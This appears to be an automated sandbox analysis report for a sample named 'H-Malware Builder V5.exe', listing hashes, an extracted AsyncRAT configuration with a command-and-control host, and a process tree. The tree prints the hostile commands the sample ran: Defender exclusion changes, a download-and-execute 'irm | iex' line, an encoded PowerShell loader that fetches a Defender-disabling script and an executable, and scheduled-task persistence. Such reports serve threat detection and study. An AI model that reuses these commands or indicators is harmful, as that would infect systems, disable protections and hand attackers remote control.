Analysis
-
max time kernel
134s -
max time network
149s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
-
submitted
04-12-2024 07:47
General
-
Target
H-Malware Builder V5.exe
-
Size
407KB
-
MD5
c8f6d76b4ae82978272bde392561c4f4
-
SHA1
80447d36fcf88cc9caa806db53e22d9468cc31ee
-
SHA256
c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
-
SHA512
10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad
-
SSDEEP
12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb
Malware Config
Extracted
https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
asyncrat
1.0.7
Default
bay-helps.gl.at.ply.gg:36538
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 36 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 33 IoCs
-
Executes dropped EXE 1 IoCs
-
Drops file in System32 directory 14 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 33 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0446f595-eaee-4d59-a113-e545f0b220dd}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm pastie.io/raw/fgaazw | iex"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"3⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"4⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"5⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"6⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"7⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'8⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"8⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"9⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'10⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"10⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'11⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"11⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"12⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"13⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"14⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'15⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"15⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'16⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"16⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'17⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"17⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'18⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"18⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'19⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"19⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'20⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV121⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"20⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'21⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"21⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'22⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"22⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'23⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"23⤵
- Checks computer location settings
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'24⤵
- Command and Scripting Interpreter: PowerShell
-
